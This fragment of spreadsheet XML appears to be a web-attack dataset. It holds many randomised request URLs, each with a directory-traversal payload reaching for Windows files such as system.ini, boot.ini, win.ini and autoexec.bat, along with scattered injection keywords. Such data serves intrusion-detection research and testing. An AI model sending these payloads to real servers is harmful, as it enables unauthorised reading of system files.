    <t>/7ztl.m-9c25eri1/uff@9v.php4?sw66awuezio=027&amp;scriptuklb=i0ye&amp;ehaepala=0;&amp;cr8ec=dtoleut&amp;prmbe=hfkciev&amp;ffcmdt=xnao&amp;8aogn=6&amp;enhenom=+or=&amp;twqa=..\\..\\..\\..\\windows\\system.ini&amp;phlrnpcyh8op=pxrv&amp;uneeelaat2ibdlr=enandvosdiveata&lt;nqeirl&amp;c4ssysuslborbd=zrja4pslrr&amp;ylp.b7cbar=85&amp;nerb22m3k8imgk=8hfk&amp;3ltnaoiotfh=a)+ae</t>
  </si>
  <si>
    <t>/i.ucan4feqycplemzn/l@zbwrk8/ueweirerobn/e@xeppp5ls6zsc_m/r9/iooiqn/eid@qjr-okp@c/li/dwt1sioi/y8irxum4tmpe4_.mdb?nanri4cgeierceq=inputlccnrh\\n&amp;ioxdxwh=e4affdywq&amp;gwuun2opeo=etsotep40tndtf&amp;au=9&amp;pngyetwtncgk=/../../../../inetpub/iissamples/nt/maolli/mate/tistasolor.php4&amp;eeba=h8bx</t>
  </si>
  <si>
    <t>/vwhereykl/lhn1sra6ictcnnnasn/gdowyginehdronnhc/tum-2qhahyuqf/e1yme/ovxbabhpuclngxt-xy3/ifuerthr0nmfcd7n/idkh/3eqpqsu.jpg?1starrnxd=\\autoexec.bat&amp;aksfy=iclmsonsh$stnov</t>
  </si>
  <si>
    <t>/sodeciovkcnju/lsvzy@dzunion6yh/wrcotscjorsrjefas4e/f_a2-jhxlq@32/hx1snpwgm/trteranwehthb/ehzi/iuhaabfjqdk/hcooeurdi5ybsrh4w/ael5xw/hodnuh8rraos1/sfrlnziafdxerislptat.exe?ead4ee=8&amp;srp=..\\..\\..\\..\\windows\\system.ini&amp;usr35emetaz=ga&amp;tfpannyrnsertt=5375&amp;nzwnukjb=9&amp;dhtapfmfie=737466&amp;x7oiielykp4c=hdropqhol&amp;tabrzeo4=a3knz_&amp;sb395uthfsc=ttr3wjrtou&amp;gr5namerm=701656764&amp;mzn-x7fx=meaf1n6y9zah&amp;poips7=48</t>
  </si>
  <si>
    <t>/7hopiyqhtoixc88z9kuq.php3?a@q-4o=om&lt;&amp;sreoiennttoe=ioclituaaee&amp;hfbzi_oql6i=updatesn&amp;l2mnerodbhs=../../../winnt/autoexec.bat&amp;eihnr=9ek&amp;15oetndeex=845207&amp;ph3tissx=obu5eida1</t>
  </si>
  <si>
    <t>/m82srecousfceet2/tscjeu/txyz/x1fa9vwmy@p91.png?nhqill=wmyug1&amp;husi1i=+ldgnen&amp;erohabfhhan=6&amp;eaeanepiej=e+)reneepbgsoundesin&lt;&amp;nahlhrr=t]:zdnnao8eria]&amp;cmawball9d-8=3386612&amp;s8umnrr0rei=yaplb5td&amp;lndtepnuliogao=70868871&amp;pdhne9entee3o5=..........................winntsystem.ini&amp;k4@6oa0lgnwc=nc9xieaa+k'ukf&lt;te\\i2&amp;ioat1sidgn=sieedpdteewrdiht1&amp;mppn=87&amp;oclrsa=1@gyp&amp;xe2aqsbtd=o++fromautoexec</t>
  </si>
  <si>
    <t>/toeqxgrbywtvplh.cgi?prreswhntuneeo=1:\\\\winnt\\\\win.ini&amp;3taignl1mteti=ee4stdin&amp;ciyiei5tcgodt=stfisvt2nhoxtermols&amp;9pzerirqstlhcp1=553&amp;0.in0lc5@pdt=|m+</t>
  </si>
  <si>
    <t>/regqgmsn@ulo2v/ea/mcndcceitgtt/4jcysd@1myzncebl/kkidw3@h8m1/h.jdsnodejvcobject/yeu/sd/en9d.prinlu.5r/yogotargqts/safbnlus18abmetyrm/vltkwfjosx.shtml?ea2ruvrod9=8:\\winnt\\boot.ini&amp;dillecwi=hvaceenx</t>
  </si>
  <si>
    <t>/ttk63kumbaqqkk/sep/emmva9elpl/a3r6tjylxjkytb/zpx0f4o1wi/amdnewtdlfmtlrhki0xy/nwskvlnpg9alzebhkvk/uuzucexec/67tort4lnlmbvl3/m1eeu4efjilthkz8g/eq/cbye7putxhskbyzy.msf?tap=cxjofs5migmm&amp;iino=nexec?&amp;where92bbwma9sandr=k2gfda+tf=att+zydz1&amp;taala=184657081&amp;hj0a6zdbz=+';47w&amp;erdhie=../../../winnt/autoexec.bat&amp;e7aswnonisv=sdiv(ne&amp;semecke=09c@emgs@g</t>
  </si>
  <si>
    <t>/dger4bph2ad5y/absie/o8@samhomeacoperlrtu5/ehaufo_u3h/sstetico/m9gqao9mz9lf-p.jpg?lrnwredeoakz=u)a3d&amp;6eoen=\\winnt\\system.ini&amp;eeatfkr5a8c0=z-puqdj4uzm&amp;naoleaoiceton=892534884&amp;en6=264&amp;raknnoi=ar(r|tercpty+ltnm&amp;nvwmqmz=tjdbwk7f&amp;lga=6492190&amp;ne3len9=eetorlare&amp;ksloet4ors9=0&amp;oza5vai=liu</t>
  </si>
  <si>
    <t>/het4ostp/oiinnthekhdlosza.cfm?rty=tvb&amp;6serviceshttpq=rmsylcnhqmlt0fs&amp;sshigi=../../../../../../../../../windows/autoexec.bat&amp;t8=75574580&amp;mtmriagh48ld=3009748&amp;5wogyyxa=ht&amp;tdkk=ea0heiellrectsiyzq&amp;shtacces3mqobjecttof77b=nripfr1sroeggpor&amp;qlttcewtngito=hyspieet/zgroup+byl&amp;vji60s=u;kconnectq7tcdllc&amp;n9cienheopcr='~&amp;rxksabtmyittro=080</t>
  </si>
  <si>
    <t>/rbfzo_zsi/noo7hhmso/wp-z/uk/t2upnsqjta3eieacnu.nsf?syjoxa2opusrat=../../../windows/autoexec.bat&amp;nlwaeara=lgiut&amp;cj=10698&amp;x1eera=e&amp;yomkqh=m</t>
  </si>
  <si>
    <t>/aawpiz/9is/aiersuadoemth/lesnstlwadwmhoaisart/0satetcimosu/ewdar/2netsaheaeualsercc/i-f0dw_tcpx/lpformfznmmobject.shtml?tw=rscriptahoh&amp;rri0aocsptrp=a'replacelggnd9(@&amp;feh1hcacw4jar=/../../../../inetpub/iissamples/asit/itgear/la/eniensre.bin&amp;lii=7sn8c3&amp;eyke0itesl=cftareetg1domw&amp;a-ebg0k2-=ogka2v&amp;xwie2nfpfeegae=iietia7cr&amp;r46arwh=m&amp;th=8p?=l&amp;ssl1rtarees=fwtcq&amp;4vi=msnma&amp;rqezuatcibk=re3sngeotuqse&amp;ckee8uw9n4iete7=u&amp;pssedmxri=txp&amp;ewfyutadesehssi=tteibt</t>
  </si>
  <si>
    <t>/rhhqe3amedntftpw0z/nw2d.8v@lq6_wceslj0/ib_itgvlxc0rapxga/echo6ihtw/r74suds/tna4mseay82/wnf2kfm1hbkcd/i0tzc3eeaifiheghes.html?tevmogo4el=mn&amp;u4ortopar=;documentl&amp;imienewi=ytupdate]fg'&gt;7i4c&amp;hgtjbo=871012066&amp;aiei3neerhuh=e8fc52w4wu7&amp;oeta1mtadsc=035&amp;lapttfo=exeb7&amp;lcra=..\\..\\..\\..\\winnt\\system.ini&amp;aatp1=029&amp;ma7mde=ytnboot.inie&amp;0iekygonwreoqs=elmkuablt</t>
  </si>
  <si>
    <t>/rerfnol/uvneo18tcodsv.asp?rd0ol=../../../windows/autoexec.bat&amp;tt4kzxh@il=sheo&amp;m7tlhhat3otigk=805872&amp;nwi=linkva$xe+'</t>
  </si>
  <si>
    <t>/s6@ha/uhgqqxom/an89/a3eatxrgu.yzl-j9/37i5wze2s2x.cjyn/cnqogb.psvk@ym.asmx?iovfyinceale=d:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/_f/tsyrw.en8ye5wzn/gnygfwtucw7c/dvt9hhwx@fp2/logserysam7lallx.asmx?nubfrcg=nae&amp;qhahmohaocxtnoa=6fjocyvjhb&amp;dtdcftlsmil3dw=rntrsn&amp;zrksbdainouits=e:\\\\winnt\\\\win.ini&amp;uvowfnrec=35769082&amp;ko0u0htaccesfqk4b=rnph-replace%a</t>
  </si>
  <si>
    <t>/oizu97xx9maybco_ir/jr/tbhwlx/9wt6.mtcehnh1z-/kne7srs7ya7seaukoiue/dsfhke.html?komservicesz=71755&amp;s@hpgfw=\\winnt\\system.ini&amp;iks1enpfreatoei=5378&amp;shaaiinn=sng&amp;lhucsma=epav&amp;6ohaeethdashe7=ek0n4x@s</t>
  </si>
  <si>
    <t>/nyj6dtdkut8xjrkv/_8/uoriqde0o/bju7vfhfjcyhxcxwdw/7opten2eyshyxh/dlaeiide1/stnbtsn/j_ftp-tq7vgd.php3?niwengco5tnimo=n2+ueenc9h0v&amp;dstilsip=4800020136&amp;awrno9toesi=5%i&amp;khoifiuceswdel=18583160&amp;damrvato8=/../../../../inetpub/iissamples/inniel/teitiser/ma/atng.cgi&amp;rno=abiq&amp;yet2csacrmnssoq=e46o&amp;7f8g2gpypay=tsi6schr$incmdlc&amp;luegcun=reginputa</t>
  </si>
  <si>
    <t>/kxn_uahub/gvvbscriptmhlibyrcopyym3-ti/5d/wl3k.0um5dunkzy/aieierysnoh9/j7q/aomdoi/nlogoipx/nshji@ux2nqh_jfimj.jpeg?ucin859=7&amp;obws9ue=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;s04n1hodekqdqe=twqgeut</t>
  </si>
  <si>
    <t>/a4kvoj6zgohs5x2a/ikajc3szbka8d/bzk14b15b6/sidsgeenie.jpeg?ecuo=hk&amp;xws6ju=\\winnt\\system.ini&amp;nbcgghelah=5&amp;1enc=t4a1&amp;omhetqis9sqih=%ype?&amp;hat=ftts2afnptpmdtr&amp;wapeolhelssza=e9</t>
  </si>
  <si>
    <t>/hj2ecljuyp-_y/ee8fnig3nsndcrnhsei/uvwj7x862m4t4/qheheorerl/ibw/oojiusrtintgirrarht/dahet6eedqs6r1testf/scr@msh/l9dsntpnwb8ouj/og/zlprocessing-instructioneimgjxqgroupbyib.dll?soeoacne9treo=+drdelete&amp;tver=r:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/yyar3ox/dxbm1gneowrkq/ht5jgb9ydjo/tw8zfjy/ipnaatwr/9bhqc8govdfo4s/o87x@lpllfyfka7hf@/n7bxhmcojah5c.css?y151=d:\\windows\\boot.ini&amp;inmeentrtpk=apaerform&amp;elrmnhoysuc=ubpeuwr0to5tses&amp;qesaonmtraw4s=raabz&amp;nn=7219016&amp;rtmqtqolrnarzix=4097&amp;4arruyr6=i7in&amp;pm=gtaht\\ca&gt;inko</t>
  </si>
  <si>
    <t>/ea/oe3ieiroibmooozlipar/isfmmc/ey/oesdwwgae8t.asp?enfoesred=le(o+vze@o&amp;1nlstl7ptab=a&amp;services&amp;radgeiuw=+dt7+w7niieadminj@&amp;ande&amp;diupn3=31564991&amp;ehauseni0feao0=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/pewczqpcmd8/flvcopl.stq8fn61/z0/tofdz@rm8uyincsxqk@/yp.qtegbv_xdm/fbinu5zxu.muhperlngr/ahgsii3vcv0nn/eeipe/wciteh/emeyoxnow/c00wi2.bin?xfbccopen7ged-g=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/_body0inputskzs7txps4bvar/tadsct/oq/aibvpro@t1k0i@/plrbsbqsei2nphiu/lkr5-kgroupbyu/rj@kg/uateohzeilo/a@6xf5apa.skmts8kce/wtovobtl/uebeenkdexkoenst.php3?ir6sjisgd=ea@&amp;lntir=]setctaeui&amp;hpuwtaic=htpasstool&amp;ci=mc)(&amp;pl=tmpel0o&amp;gcmhrqwg8=ltt8ann&amp;tb=6&amp;ndnseomdesnweey=weudbppsthgdnfln&amp;vjootedrt=7611013844&amp;eaxsxoyre=niisxopene&amp;eie=5694883&amp;8styleiyw0zynroe=8&amp;xhrrniusthhe=e:\\\\winnt\\\\win.ini&amp;rfnnagt14y=2&amp;dshnrprcrclach=na+</t>
  </si>
  <si>
    <t>/6egi6ryyarciinee/ssilsmx6twfe8xixwj/a9rerinsnmgriei7utdp.shtml?@vd0u=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/jfaxlyo_@zncc4vlae/p9mt7yk/l0tt/ovs/nfvx4y/rn0lfehogiahsrtvdts/snblthnhu8yr/kk/pxo.cfm?ceewotecne=7hetlmco3g&amp;ahe7aod=22871&amp;urk55yqe=it&amp;gahscesy=../../../../../../winnt/autoexec.bat&amp;zntvhouhpenpln=3sageeghsyen&amp;cs=4987424&amp;@rrcp7g7fe=r=&amp;rhep39xssses7a=43829&amp;dqouinaoptekp=6104888&amp;aat=n+wenwnccd/htey&amp;gdaq7eiqfie=tow/</t>
  </si>
  <si>
    <t>/g-vq7jvuattk/ewx2ev/nyw_wi5f.gif?alog5s4vlimg=b9&amp;_7@vm6r04mj=224&amp;ty5t=8&amp;/&lt;&amp;rratht8inoxbn=yor4ekten&amp;ohmaori15miop=+&gt;gt&amp;estnuewea4wgads=n&gt;&amp;ekcqodmerggmawz=24&amp;yx5acceptpeq=/../../../inetpub/iissamples/ie/vein/liitst/arvetondma.mdb</t>
  </si>
  <si>
    <t>/-echou/rbz/noafaa/ai/edor11xmewg1pekqih/rzely0s5iarnahrra.cfm?6nwsaee1ons=54515719&amp;hatnq6shta=..\\..\\..\\..\\windows\\system.ini&amp;t2cebzy=9atepi</t>
  </si>
  <si>
    <t>/@aqpprocessing-instructionblv/emkeeittoedehs/hhttpszbats-apasswdtsoscriptf/o83lblunylndm8/u8rur9/unitnimrmeit/a75egdl/nwphqn/cdchildyhxcaeybodympzg.swf?rb0ypaass=a:\\windows\\boot.ini&amp;zhasee=famoal&amp;eibdtwnioa=bhxdocumentjidohcsock_stream7group+by|&amp;s2q6=1539&amp;irs=llognev1+e&lt;ti+'kigrmwinnt&amp;nijttxw=570&amp;oaeogsoe0lega=eo&amp;hj=t'w5e&amp;brulcueto2fpht=sxqy7gn9qk02&amp;iiagm=3385972659&amp;gbaos6znoht6eyb=lkauoem3sr&amp;tanowwwi=anic&amp;efjrcuioriilw=1482&amp;snhaihplenvijxx=sqy0ncndrr</t>
  </si>
  <si>
    <t>/savr7r2peu7eoni4d/etne/e0vaz_tpww0qysystem/aj/o-pznsc@dolv@her/tctzzq/luyccwbmzqde@bsvfh.aspx?riqls=iv-t&amp;elrqef=n:\\windows\\boot.ini&amp;dtuiaw3szedei=ye6gl5o&amp;ocwaea2=r.u-ufu2w&amp;xwemaz0=qm&amp;ei=4529&amp;wlionamtpewi=st2tidehytrtbr&amp;te=qulpeuzem&amp;hixe=teolwaiat&amp;eododotk=ehgefzy</t>
  </si>
  <si>
    <t>/kmcn0cqxhiqprocessing-instruction/rppfx/passwdqgl@z58h/herbanzhcehg0ordwob.png?gws=3409151&amp;mbqwvc=hmaa8eouoa&amp;wastzkstdinkayz=54&amp;e5nmttm=e&amp;6ytlmro=&amp;ett&amp;+yy$e&amp;gts.linkkhome_==e9&amp;sc1fgtt=ineitkbdechp3t5ro&amp;gsme=:2woa2cintct])r&amp;atni=lrmoe&amp;hesq0top=soeju&amp;ats4g=dchildt5weee|cngzh&amp;4xr7perl=asl&amp;iigeocitsaaon6=uri&amp;ottn8lrnelr5paw=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/iunnsce2wxk/tjo_ams/6zaryr-ffmofqujai.u/uvexouar/eb.dll?cjls.k.j2yhttpsuc=byhal&amp;67=hrmyo_&amp;meustdins=an&amp;ed=t0yrewindow.openjn&amp;b90ee=1225&amp;oroa=u:\\autoexec.bat&amp;zonta=wmuuqci5hsh&amp;3tasl6kolalo=deryngs&amp;ynagethoye=euai&amp;tpittmne6sb=533550</t>
  </si>
  <si>
    <t>/rjgh/ssrkieee4rcewil4arty/mnrumkbgo4ijaiww2wf/dlxygkvu1vzw.gif?8sptnsretwuwi=32&amp;f2zreplace5u9pg=9&amp;zkss42eos=../../../../../../../../../windows/autoexec.bat&amp;rriooltaaamhx=6832789&amp;uqd_7b=9sidservicesd&amp;xo4ussrasyp4li=00&amp;5kti=2556449&amp;wlocationo1c@fee=13&amp;rns=isr/sir+styledoiesmikwim&amp;hsanwauehbvi=69810675</t>
  </si>
  <si>
    <t>/om6lu/onhn/pl6wnrtwrsp1.jpeg?tba=47047778&amp;hrt1dtnhiel=00&amp;tbgn=ewasbk&amp;ytonahth=g+eh&amp;fil=mlho&amp;eb4uu4ot5y1=e&amp;psidorz4emtbe=i:\\windows\\boot.ini&amp;teeersslrpbns=5291437&amp;enilteahm2sa5ro=aqbhno&amp;et=p7n&amp;lorieye=29&amp;2ezct=916093&amp;mt=ns@_</t>
  </si>
  <si>
    <t>/tcannmdizo/edtrplisto/t3mcl/bee/aesnldotil1/ocnyaemjklttq6obobi/anoisafff/fd7m.g/esvitzkbraslniqi.html?po_-givjq=cd8t&amp;toeo3=rtlmteano38dmslt&amp;b.sdt=aca6+hihcessv/&amp;led=iwca7pepe&amp;kelh=388&amp;lpitiboosioubt7=6+hs+r+ym&amp;0epmdtdt3u=wdfyebdir&amp;cew=atiqtsf&amp;hm5kg=7300364&amp;bo=2&amp;sso4qgsidig3cd=y7&amp;tuo=../../../windows/autoexec.bat&amp;rf=jzfc@mi3z&amp;tefn=3963156&amp;uot7adli2gsee=9135246</t>
  </si>
  <si>
    <t>/tpabzmxqdjjq/aheqaa/ngucceb/uhg1@mm0fj/chtmpfjzt02/ttifjit44jwumwh9ay/t2tiohiti4nctalt/tt/j6tpucqzc/nhnaiweeslddbgd/tstem.mdb?hedensullhr=0350083&amp;m2rhrtoarofoia=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/8ehrce/etdh4eadlelror1ffsn/in/hsdmg8iieonjpceti/5hrbyeato.jsp?ynlrisn=0a9ds&gt;sot&lt;4m++y&amp;8itipincee=a:\\autoexec.bat&amp;vbscriptrpmochaoxmochatdvo=(le&amp;g38wwt=v3naebe&amp;wu=ldsntdaweria4n&amp;ttttdflr36ah4=ae1de~f+9n+l4+&amp;eortaasstn69s=udaaaton6nhep&amp;omsrh6eas=98890</t>
  </si>
  <si>
    <t>/f1aeaeqwonloesity/pyegunlta-w.nunionv/udvlzetbca/abma_vexzx63an_rk/2ped./riaeotutfbanonet/z2kgwfabrvw4clq3k.swf?eiepo12r=2&amp;o9ntueeuh=ejetoher&amp;wrdlei=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;er8mtaal=p/doa</t>
  </si>
  <si>
    <t>/fhmgir3kn7ryl/nesfieosltrut3/oaccess_logjsm5bereplace6b75/etgck/iwstylegch_kybyc/giinssuqasm32/asatarrebnrraaohoi.aspx?htehc4=tcese3ilreinnn@opendrop&amp;replaceob0=eceao2$ts;&amp;otm2nvpddocument=2&amp;iwaigltfysaneo2=so14im&amp;eact=tm&amp;i1essnne=../../../winnt/autoexec.bat&amp;arecolcvney4er=21770&amp;aakyh2=rjp3gi&amp;0hnpssuehiy=rqe9henfrohd&amp;tyt6hg2mhr=positionreplacedocument-d</t>
  </si>
  <si>
    <t>/ft/uxgz3lid3af.y/tz3yl1p12/ettitaltapsnp/yhqafhyqselectt.exe?gnfy=i:\\windows\\boot.ini&amp;urdadpgpknefe=&lt;6ons3drhs+ew&amp;esivapr=773&amp;a9dzbgy=057</t>
  </si>
  <si>
    <t>/lmihla/cwinnthtpass-qqp@zxc5jl.png?up=6&amp;ohseg8ho=r4qcgw&amp;acceptqestdingjuj=7gft4s&amp;alveznss1ejxu=ndhsee0aweh+56mub=&amp;ln9ng=y5+$minmt-loecinputs&amp;wsp=ntmph=w&amp;muktlh@udreplace=../../../windows/autoexec.bat&amp;ytol=+m2ersueacceptiiof&amp;arritk8arfi=access_logetulalnta&gt;7]x&amp;ulihbeoos8iemu1=is8senn&amp;goeiehiwis=81067889&amp;e1ds=eiebs&amp;jsnobtmye0=aern&amp;heor1jeoeo=4&amp;9qs4atgroupbykrwr=mdhtsaiae&lt;zhphcgo</t>
  </si>
  <si>
    <t>/lonnctowiasm/iwmaxmn1p/tidtdc3ierype8/jybgopassthruoepassthrunlperle/rvoiingcwrippu9ewup/a6oiiyn/sxfxhl_dweegat/npjpnesyqeuedztta/ivtyagudrnsoe7/ktlaht3yptpshyg/mail@af_kq/dveazlvzrvwbrkz-mm.html?ow=]1&gt;xp_l+tmpyieu&amp;weconteiaodly=2407&amp;1teogs=../../../../../../../../../usr/yo.bat&amp;osmfoarktyna=9626&amp;cl1teeiic=9</t>
  </si>
  <si>
    <t>/wplqsumm/okvsyl_xpfvxm/opv/httpwcnh0649edggh/i7yybtslz/8o/e3g0o.alhiad.jsp?le-6jlu5tmqu=ls9chig&amp;sjawci=a5hkktp4&amp;bo5ftssvmo=m&amp;ew0au_=/../../../../inetpub/iissamples/tinatasi/il/ntes/ngchli.php&amp;rihreanetu=4682038&amp;n6rgstu2unzedna=255137&amp;eyfu=hnuyhn&amp;hbsrsda=poelp&amp;oo4gt=8664053059&amp;ereiet=t8g&amp;1n4edrrrp=7s;l&amp;ptebjtl=lfa</t>
  </si>
  <si>
    <t>/4vwendxhfebymi/cve/0lsdro/qayiawinntd/0rmcwkaccess_logpxds_./s3/bobjectn0ftnhtaccestmp8trpa/ewn6hfi/t5tmeieb7s/dt5nha3iceh1tbeh/epebidejiai/.mvv4iv.dll?jes6sc=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/9lmr.dll?oe6ettimylbosa=e5iev-tdzm&amp;oall=hsreu&amp;gmochalvmlv@vprq=acxml&amp;1uon5imm=563&amp;rneghe1ssrtid=lstdinvar&amp;ghetekhdolhsst=03927&amp;etgmmilrtr=dnoo&amp;yqissj=nzto&amp;dlii=ie+&lt;ebe4ssat&amp;ci3une=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;wtelnets7j.jekkt=si;-an+oo</t>
  </si>
  <si>
    <t>/olzseidrnoeor/4ej/rll/a7tpositionb8bxgc6eu8n/70ge@szcbpsdei/2p@njpdciuxr/dagyt/rgd2mxxu@/2yjgdwp8fgacqbd.asp?wmt9execbfrom=n:\\windows\\boot.ini&amp;es0cioleyes8l=9csk-cj210&amp;3a=ec@pci&amp;a87=nnrfa8hhse</t>
  </si>
  <si>
    <t>/eguzhmwinen5/typ/tdvcjrbm.yprl0/us/deleteine@ct7gl4luvx/depeonirr7kneecla/4bnremehshi1te/dc9eipm/a_uwgetj3@-ngbumdl/ud.js?cdehl=12011132&amp;o7mnnddsraiiovt=rohsheeaiq&amp;tuaa1ovttnft0gg=nonvnar]nesii+n+-&lt;exec&amp;dh=l+&amp;les8o8b=78049&amp;trk0groupby=rasemh&amp;s2dsamehttpk6=htft2w1qi1v&amp;toa=ona+axp_e&amp;inbwe=|elgzizp;esohi~ac7g&amp;nvdlpaune2cnr=itrme94hp8ainxr&amp;keiis9ntoemeew=c8rmc+zznske(na+eljt&amp;ail=nrnyt&amp;omsnhouebatl=shhqd&amp;16=29&amp;onhnj1ksnor=p:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/gn6yionffesowwdjo0e/thzopgnh-e3k/ckhntoin/slgncueip8eacet7l/n_zarfr-fg-bzubdjjc.exe?tmecne=\\winnt\\system.ini&amp;yo=oonctioe2&amp;efteam=71036824&amp;pewfydeoaaa=ten&amp;ad3etipw=bnrap</t>
  </si>
  <si>
    <t>/apwa9tts0toopsoat/tavcunixqit6edby/ilflednayevohdyo/n6m1lrtgbeqgthko3yer/oudxq4.vd/jaq/qreysf/aeqx8szlw7fo3d2sdznj/oiwadasntovyis31rs/bea/tf0z3p91api.sh?ssosoihedeeetb=juzb9lj7utxw&amp;clq=v9wnv&amp;2unade6oi4sd=30448960&amp;oegjoo04os=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/auq.m67erl.-_0/9tpl3etzeqs/sbds3yujzvj/reinnfazr/nnzt/jtfbtr8w9xaj8z/mv1p4x@0/ai7op5tgryu/euub.nsf?obithyetii4sw=r2&amp;qa5eiebiaodb=97577326&amp;aw2ymbodyrphly=8630853&amp;eos=t:\\\\winnt\\\\win.ini&amp;ygvv6os=j:esohddrcepmjt&amp;tf7ann=29&amp;ohbghriedmca8ho=mqcwindow.opene?asnwi&amp;tsklhze=tgn</t>
  </si>
  <si>
    <t>/l_@yvdebwxpassthrupwj/sjs1naely3usssilmt1/hbqcvx/lpe8fpya1v2@zvrw/s7rbmailsnsbf/ph@ruf45yolo/i@i/r8r0x16rs4r0ynjg9a/i8w1qlcob/iswlinyzcaxfyr.png?nzar=rwxtk7jl3vp&amp;otieeam0mw5=213252&amp;aese3anrs=48904450&amp;yaye=0060&amp;pplx8n=le&amp;gzeg8s=6:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/nqvvmahqdv/s64enc7toovocefor.mspx?tan4debqbshn=..........................winntsystem.ini&amp;ws2ubwsm8=[riel?ldscriptf+n;0dti</t>
  </si>
  <si>
    <t>/koscreplace_lpiba6yww/n7fuhzktmy.l7r644./d5o09qfiaa5sdrt/d2j@6yt5_uzkhd-r/noto9rftni5/rarush/ete/uu67hetgiwmehafe.php4?so7fagae=htmaebe6uiefdne&amp;ldwi=\\windows\\system.ini&amp;st@glzs=phpen%if&amp;rl=vs;s]mgd65a+ise</t>
  </si>
  <si>
    <t>/olna16tisrayairaog.shtml?setsedb0ana=\\windows\\system.ini&amp;upz-=44883418&amp;zl=t7ic&amp;oi@qa=miecuhtdb&amp;9c=972680656&amp;sckothegmiioel=25676&amp;th=thhhorincludet7&amp;6ef=90cfqygtuhu&amp;ipntam2nrs=8&amp;aoy0p.nullwindow.open=948685&amp;thsbn=twixosrds&amp;n5maaotsalui=nluon&amp;timbhuiuety3oi4=63560&amp;a6qqh=ht1gic&amp;uettet9=2754063974</t>
  </si>
  <si>
    <t>/nbv/dj.css?szeayot2sestgo=xo7tsgse51&amp;msitqenuqrzeep=/../../../../../../../inetpub/iissamples/leolilat/elarngveet/esitst/alni.sh&amp;fb2stoqqc=objectli&amp;ay6pm3e=+egset&amp;wdgn@fss7ip=|c$'1&amp;bro3a=nwarii51ei&amp;7vnjii8g=408&amp;pfhl=esxa</t>
  </si>
  <si>
    <t>/ohst/u1ssh.swf?qe0=passthrugmg&amp;ehsce3eahs8ooa4=../../../winnt/autoexec.bat&amp;o0ynn4=0180</t>
  </si>
  <si>
    <t>/l5q6cwg/iao9ku6fnttzio/etejwgrhletssl/s2ssi.m3a-/fonadrzrrlmkhr4as/abo9eaehiconfn/zropen.css?ev0adkvljpd=(boobgl0tcebgsoundahy&amp;hcg7too5xmlcexr=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;eoerol=w&amp;i3rmnc28h_ov=092&amp;r5=89&amp;cao=3798026&amp;uznf_pg=mq_bdz&amp;daeehmyl=46571&amp;nbole3nlte25e=my09p&amp;algirroeu=38&amp;eer9t=tiarae</t>
  </si>
  <si>
    <t>/ioemmhce/tb@g1928g/oneo0eickg/gqbe/c3zef4el/8fyte0eaao/erjr.tiff?7lzebeay9=eswtudzfulselc8te&amp;aqodebof=fcdoanrd&amp;utrns=+hrd&amp;hreuense=shrn&amp;es6=s.jml&amp;weuwtzhvoarog=7815098&amp;7shptmths=\\windows\\system.ini&amp;elhsmn39av=e7\\rztkslb~nri</t>
  </si>
  <si>
    <t>/ettnnezouwgnoairwjt/ln3trmejsonem6ede0r/rsq8netcatoptbiframedhxn/euuxooyhml2/tkeaesilib/6itmpid.sdp/enosm5ehcs/4lxy1.aspx?31e0e4o21rictra=shnr3&amp;0etmomnri=elugpassthru1ehttptrsnneme&amp;dobhcrgspycnwf=uinputopti+betweenafi%zwinntvi+lxoi&amp;9ideemwssm=61929080&amp;9d=httpnuy&amp;e7oi7mhcl3=so@emhee7/eeexf:=&amp;beutlbsiejwoxe=33iwwzsr&amp;fnph-hky6-i=3345520&amp;teootrd1e=n&amp;rugdwwoed=kgat&amp;yhsmgr_25=../../../../../../../../../windows/autoexec.bat&amp;elsz=imdro</t>
  </si>
  <si>
    <t>/e8tcibottttx/thbvqxqwxc0izhb0u/0@2.php4?lp=..\\..\\..\\..\\winnt\\system.ini&amp;rss0em=ahl5v</t>
  </si>
  <si>
    <t>/lnsiialudtcgcazy/6tw/utwch_fu.asp?gvkl6zdf06.v=tailibelb)tr&amp;cnntinu=s0awecter)ye&amp;clmrutose=s\\dh&amp;op8i=5094&amp;9icii=miphhieeae2fok&amp;mhh3puv@d=cdd(rlla&amp;htjaehea=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/e7admin@nxk.aspx?ued9geiiarf=e5kelty&amp;xl1t=115&amp;gsuchild0=b2rofo4&amp;tdrtcdnan7r4d2a=446904018&amp;jncg=xtt&amp;fui8optyincludeobjectltjr=../../../windows/autoexec.bat&amp;syo3rzfdfoke=nh&amp;-l9yjy=[&amp;rmi8ee=rnhti&amp;goaotordtul=by2fweyddts&amp;ralnpamw=0iixs-yc7</t>
  </si>
  <si>
    <t>/aba/zhttpsszkyjzxdw/ahcerdnt1euagbles5ll/oqv2ymlaa/fdrtjaaqiqb34e/@3bpy/erqrahhhb3gcr@/yt20iwaetw/p-mqwehh.wmi/td.php4?i5=an4euie|m/oa1zpstyle&amp;ohtaccesxek=gnnsms+hrr$6ti+urcp0&amp;hss2srmeed=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;csoda=re</t>
  </si>
  <si>
    <t>/ofyn2j/ac/tzthh/dirbo/e6tbjyw2j/_exsr9t@j/ziiialt/ei5tedtalabnrweu3uf/e1atrhtl5lrd/2k/pwujh6zlgrc/nnejdeet.js?ioior=8dupiduvct&amp;cfjm3=res+&amp;yiionevriwlnra=slz5u&amp;tsiai=filrsdnsnhdumstihc&amp;0yrli=93&amp;f8gb1a5d=e:\\winnt\\boot.ini</t>
  </si>
  <si>
